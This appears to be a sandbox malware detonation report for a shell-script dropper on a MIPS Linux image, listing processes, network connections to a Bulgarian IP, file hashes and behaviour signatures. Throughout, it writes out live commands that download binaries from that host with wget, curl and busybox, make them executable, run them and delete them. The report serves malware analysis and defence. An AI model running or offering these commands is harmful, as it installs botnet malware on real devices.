[wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/chmod

[chmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly

[./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/rm

[rm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/usr/bin/wget

[wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/chmod

[chmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m

[./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/rm

[rm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/usr/bin/wget

[wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/chmod

[chmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67

[./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/rm

[rm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/usr/bin/wget

[wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/chmod

[chmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT

[./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/rm

[rm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/usr/bin/wget

[wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/chmod

[chmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp

[./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/rm

[rm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/usr/bin/wget

[wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/chmod

[chmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ

[./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/rm

[rm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/chmod

[chmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq

[./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/rm

[rm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/usr/bin/wget

[wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/chmod

[chmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N

[./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/rm

[rm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/usr/bin/wget

[wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/chmod

[chmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj

[./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/rm

[rm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/usr/bin/wget

[wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/chmod

[chmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp

[./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/rm

[rm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/usr/bin/wget

[wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/chmod

[chmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S

[./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/rm

[rm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/usr/bin/wget

[wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/804-1-0xb6736000-0xb6747044-memory.dmp

memory/810-2-0xb6780000-0xb6791044-memory.dmp

memory/816-3-0xb6736000-0xb6747044-memory.dmp

memory/884-4-0xb66ed000-0xb66fe044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-21 01:30

Reported

2024-10-21 01:32

Platform

debian9-mipsbe-20240611-en

Max time kernel

96s

Max time network

99s

Command Line

[/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA N/A
N/A /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz N/A
N/A /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb N/A
N/A /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S N/A
N/A /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly N/A
N/A /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m N/A
N/A /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp N/A
N/A /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ N/A
N/A /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq N/A
N/A /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N N/A
N/A /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj N/A
N/A /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp N/A
N/A /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 N/A
N/A /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT N/A
N/A /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly N/A
N/A /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m N/A
N/A /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 N/A
N/A /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT N/A
N/A /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp N/A
N/A /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ N/A
N/A /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq N/A
N/A /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N N/A
N/A /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj N/A
N/A /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp N/A
N/A /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S N/A
N/A /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA N/A
N/A /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz N/A
N/A /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /usr/bin/curl N/A
File opened for modification /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /usr/bin/curl N/A
File opened for modification /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /usr/bin/curl N/A
File opened for modification /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /usr/bin/curl N/A
File opened for modification /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /usr/bin/curl N/A
File opened for modification /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /usr/bin/curl N/A
File opened for modification /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /usr/bin/curl N/A
File opened for modification /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /usr/bin/curl N/A
File opened for modification /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA /usr/bin/curl N/A
File opened for modification /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /usr/bin/curl N/A
File opened for modification /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /usr/bin/curl N/A
File opened for modification /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz /usr/bin/curl N/A
File opened for modification /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /usr/bin/curl N/A
File opened for modification /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /usr/bin/curl N/A
File opened for modification /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb /usr/bin/curl N/A
File opened for modification /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /usr/bin/curl N/A
File opened for modification /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /usr/bin/curl N/A
File opened for modification /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb /usr/bin/curl N/A
File opened for modification /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /usr/bin/curl N/A
File opened for modification /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /usr/bin/curl N/A
File opened for modification /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /usr/bin/curl N/A
File opened for modification /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /usr/bin/curl N/A
File opened for modification /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz /usr/bin/curl N/A
File opened for modification /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /usr/bin/curl N/A
File opened for modification /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /usr/bin/curl N/A
File opened for modification /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /usr/bin/curl N/A
File opened for modification /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /usr/bin/curl N/A
File opened for modification /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA /usr/bin/curl N/A

Processes

/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh

[/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/bin/chmod

[chmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA

[./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/bin/rm

[rm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/usr/bin/wget

[wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/bin/chmod

[chmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz

[./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/bin/rm

[rm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/usr/bin/wget

[wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/bin/chmod

[chmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb

[./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/bin/rm

[rm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/usr/bin/wget

[wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/chmod

[chmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S

[./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/rm

[rm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/usr/bin/wget

[wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/chmod

[chmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly

[./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/rm

[rm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/usr/bin/wget

[wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/chmod

[chmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m

[./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/rm

[rm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/usr/bin/wget

[wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/chmod

[chmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp

[./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/rm

[rm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/usr/bin/wget

[wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/chmod

[chmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ

